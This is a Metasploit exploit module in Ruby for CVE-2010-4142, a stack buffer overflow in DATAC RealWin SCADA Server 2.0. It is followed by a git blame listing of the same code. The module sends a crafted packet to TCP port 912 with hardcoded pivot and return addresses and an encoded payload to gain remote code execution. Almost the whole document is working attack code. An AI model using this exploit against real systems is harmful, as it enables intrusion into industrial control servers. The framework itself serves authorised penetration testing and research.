metasploit-framework/modules/exploits/windows/scada/realwin_scpc_txtevent.rb

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
#   http://metasploit.com/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
	Rank = GreatRanking

	include Msf::Exploit::Remote::Tcp

	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'DATAC RealWin SCADA Server SCPC_TXTEVENT Buffer Overflow',
			'Description'    => %q{
					This module exploits a stack buffer overflow in DATAC Control
				International RealWin SCADA Server 2.0 (Build 6.1.8.10).
				By sending a specially crafted packet,
				an attacker may be able to execute arbitrary code.
			},
			'Author'         => [ 'Luigi Auriemma', 'MC' ],
			'License'        => MSF_LICENSE,
			'References'     =>
				[
					[ 'CVE', '2010-4142'],
					[ 'OSVDB', '68812'],
				],
			'Privileged'     => true,
			'DefaultOptions' =>
				{
					'EXITFUNC' => 'thread',
				},
			'Payload'        =>
				{
					'Space'    => 550,
					'BadChars' => "\x00\x20\x0a\x0d",
					'StackAdjustment' => -3500,
				},
			'Platform'       => 'win',
			'Targets'        =>
				[
					[ 'Universal', { 'Pivot' => 0x40017fc2, 'Ret' => 0x4001f6d0 } ],
				],
			'DefaultTarget' => 0,
			'DisclosureDate' => 'Nov 18 2010'))

		register_options([Opt::RPORT(912)], self.class)
	end

	def exploit

		connect

		data =  [0x6a541264].pack('V')
		data << [0x00000010].pack('V')
		data << [0x00001ff4].pack('V')
		data << rand_text_alpha_upper(164)
		data << [target['Pivot']].pack('V')
		data << rand_text_alpha_upper(16)
		data << [target.ret].pack('V')
		data << payload.encoded
		data << rand_text_alpha_upper(10024 - payload.encoded.length)

		print_status("Trying target #{target.name}...")
		sock.put(data)

		handler
		disconnect

	end

end
added exploit module realwin_10.rb git-svn-id: file:///home/svn/framework3/trunk@11067 4d416f70-5f16-0410-b530-b9f4589650da 2010-11-18 23:45:40 +00:00			`##`
			`# This file is part of the Metasploit Framework and may be subject to`
			`# redistribution and commercial restrictions. Please see the Metasploit`
Fix up the boilerplate comment to use a better url 2012-02-21 01:40:50 +00:00			`# web site for more information on licensing and terms of use.`
			`# http://metasploit.com/`
added exploit module realwin_10.rb git-svn-id: file:///home/svn/framework3/trunk@11067 4d416f70-5f16-0410-b530-b9f4589650da 2010-11-18 23:45:40 +00:00			`##`

			`require 'msf/core'`

			`class Metasploit3 < Msf::Exploit::Remote`
			`Rank = GreatRanking`

			`include Msf::Exploit::Remote::Tcp`

			`def initialize(info = {})`
			`super(update_info(info,`
renamed. git-svn-id: file:///home/svn/framework3/trunk@11125 4d416f70-5f16-0410-b530-b9f4589650da 2010-11-24 13:44:46 +00:00			`'Name' => 'DATAC RealWin SCADA Server SCPC_TXTEVENT Buffer Overflow',`
added exploit module realwin_10.rb git-svn-id: file:///home/svn/framework3/trunk@11067 4d416f70-5f16-0410-b530-b9f4589650da 2010-11-18 23:45:40 +00:00			`'Description' => %q{`
			`This module exploits a stack buffer overflow in DATAC Control`
			`International RealWin SCADA Server 2.0 (Build 6.1.8.10).`
			`By sending a specially crafted packet,`
			`an attacker may be able to execute arbitrary code.`
			`},`
renamed. git-svn-id: file:///home/svn/framework3/trunk@11125 4d416f70-5f16-0410-b530-b9f4589650da 2010-11-24 13:44:46 +00:00			`'Author' => [ 'Luigi Auriemma', 'MC' ],`
added exploit module realwin_10.rb git-svn-id: file:///home/svn/framework3/trunk@11067 4d416f70-5f16-0410-b530-b9f4589650da 2010-11-18 23:45:40 +00:00			`'License' => MSF_LICENSE,`
			`'References' =>`
			`[`
add cve and osvdb refs git-svn-id: file:///home/svn/framework3/trunk@11068 4d416f70-5f16-0410-b530-b9f4589650da 2010-11-19 14:17:35 +00:00			`[ 'CVE', '2010-4142'],`
			`[ 'OSVDB', '68812'],`
added exploit module realwin_10.rb git-svn-id: file:///home/svn/framework3/trunk@11067 4d416f70-5f16-0410-b530-b9f4589650da 2010-11-18 23:45:40 +00:00			`],`
			`'Privileged' => true,`
			`'DefaultOptions' =>`
			`{`
			`'EXITFUNC' => 'thread',`
			`},`
			`'Payload' =>`
			`{`
			`'Space' => 550,`
			`'BadChars' => "\x00\x20\x0a\x0d",`
			`'StackAdjustment' => -3500,`
			`},`
			`'Platform' => 'win',`
			`'Targets' =>`
			`[`
			`[ 'Universal', { 'Pivot' => 0x40017fc2, 'Ret' => 0x4001f6d0 } ],`
			`],`
			`'DefaultTarget' => 0,`
reverting the disclosure dates for now need to clean up the patch git-svn-id: file:///home/svn/framework3/trunk@12540 4d416f70-5f16-0410-b530-b9f4589650da 2011-05-04 20:43:19 +00:00			`'DisclosureDate' => 'Nov 18 2010'))`
added exploit module realwin_10.rb git-svn-id: file:///home/svn/framework3/trunk@11067 4d416f70-5f16-0410-b530-b9f4589650da 2010-11-18 23:45:40 +00:00
			`register_options([Opt::RPORT(912)], self.class)`
			`end`

			`def exploit`

			`connect`

			`data = [0x6a541264].pack('V')`
			`data << [0x00000010].pack('V')`
			`data << [0x00001ff4].pack('V')`
			`data << rand_text_alpha_upper(164)`
			`data << [target['Pivot']].pack('V')`
			`data << rand_text_alpha_upper(16)`
			`data << [target.ret].pack('V')`
			`data << payload.encoded`
			`data << rand_text_alpha_upper(10024 - payload.encoded.length)`

			`print_status("Trying target #{target.name}...")`
			`sock.put(data)`

			`handler`
			`disconnect`

			`end`

			`end`